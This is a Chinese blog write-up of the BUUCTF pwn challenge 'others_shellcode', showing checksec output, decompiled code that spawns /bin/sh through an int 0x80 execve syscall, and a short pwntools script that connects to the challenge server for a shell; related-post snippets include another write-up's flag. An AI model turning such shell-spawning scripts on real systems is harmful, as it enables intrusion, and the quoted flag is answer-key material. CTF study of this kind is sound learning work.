BUU刷题-Pwn-others_shellcode

最新推荐文章于 2024-05-07 16:02:29 发布
最新推荐文章于 2024-05-07 16:02:29 发布
阅读量173 收藏
点赞数
分类专栏: BUU_pwn解题wp 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/131669418
版权
文章介绍了如何在无需栈地址、LIBC地址等传统依赖的情况下,通过分析题目提供的ELF可执行文件,利用int0x80或syscall实现系统调用,从而在给定环境下利用核心伪代码进行内存溢出攻击并获取shell。
摘要由CSDN通过智能技术生成
解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:
    获得shell或flag:[[利用int 0x80 OR syscall(系统调用号)]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file others_shellcode 
others_shellcode: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c1e8d8e26946c6b08794abdad991e3909e1bdc7f, not stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=others_shellcode 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   72) Symbols       No    0   0others_shellcode

libc版本:
wp借鉴:(24条消息) [BUUCTF-pwn]——others_shellcode_Y-peak的博客-CSDN博客

核心伪代码分析:

存在利用的的代码:

int getShell()
{
  int result; // eax
  char v1[9]; // [esp-Ch] [ebp-Ch] BYREF

  strcpy(v1, "/bin//sh");
  result = 11;
  __asm { int     80h; LINUX - sys_execve }
  return result;
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  getShell();
  return 0;
}
分析:

系统调用号,nc即可获得shell

脚本:
from pwn import *
context(log_level='debug',arch='i386',os='linux')

pwnfile='./others_shellcode'
sh=remote('node4.buuoj.cn',29881)
#sh=process(pwnfile)

sh.interactive()
Brinmon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
[BUUCTF-pwn]——others_shellcode
Y_peak的博客
02-12 1168
[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存
[BUUCTF]PWN——others_shellcode
mcmuyanga的博客
10-24 816
others_shellcode 附件 解题步骤: 例行检查,32位程序,开启了NX(堆栈不可执行)和PIE(地址随机化)双重保护 试运行了一下,发现直接就能执行shell的命令 远程连接运行一下,直接就获取到了flag 一道简单的shelllcode的直接利用 ...
Finding system calls
farmwang的专栏
07-26 397
/usr/include/asm/unistd.h #ifndef _ASM_X86_UNISTD_64_H #define _ASM_X86_UNISTD_64_H 1 #define __NR_read 0 #define __NR_write 1 #define __NR_open 2 #define __NR_close 3 #define __NR_stat 4 #defin
others_shellcode
m0sway的博客
03-30 404
others_shellcode WriteUp BUU_PWN
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
others_shellcode[BUUCTF]
moonlightsunshin的博客
05-07 518
在 x86 架构的 32 位模式下,int 0x80 是一个软件中断指令,用于从用户空间调用内核空间的服务,即 Linux 系统调用。这个指令会触发一个异常,将控制权传递给内核的异常处理程序,该程序会解析由用户空间代码设置的系统调用号和参数,并执行相应的内核服务。然而,需要注意的是,在 x86-64(也称为 AMD64)架构的 64 位模式下,Linux 采用了不同的系统调用机制。寄存器中,参数则根据系统调用的不同而有所变化,但通常也会存储在寄存器中。指令时,系统调用号通常存储在。寄存器,将参数按照约。
BUUCTFPWN】others_shellcode
m0_55368674的博客
01-13 185
BUUCTF other_shellcode题解
others_shellcode wp (python3)(含getshell过程详解)
Kata_Jhin的博客
03-19 223
others_shellcode wp (python3)(含getshell过程详解)
buuctf|pwn-others_shellcode-wp
l2645470582_的博客
11-09 167
1.例行检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查找关键字符串,没有看到有用的字符串 3.我们进入main函数看看 我们进入第一个函数看看,没看到什么有用的信息 我们再进入第二个函数看看,我们看到了熟悉的身影 除此之外我们并没有看到什么有用的信息 4.EXP 我们先试试用nc能不能打通,因为getShell()函数里面有权限 nc node4.buuoj.cn 28625 ...
CTF-PWN-buuctf-others_shellcode-系统int80调用的使用方法
serfend's blog
04-24 1598
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1twNiCnqBL17_WuQr1NdGBQ?pwd=g9by 提取码:g9by 答案:flag{d07d7b41-1672-4338-a72c-43e12c26c587} 总体思路 这题是一道32位系统调用的教学题 [CTF pwn]傻傻分不清的execve、int80、syscall、system及shellcode 详细步骤 查看文件信息 in
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 415
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
BUUCTFPWN】ciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 424
BUUCTFPWN】ciscn_2019_n_5题解
buuctf pwn 19-23
XDiku的博客
02-05 143
ok
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值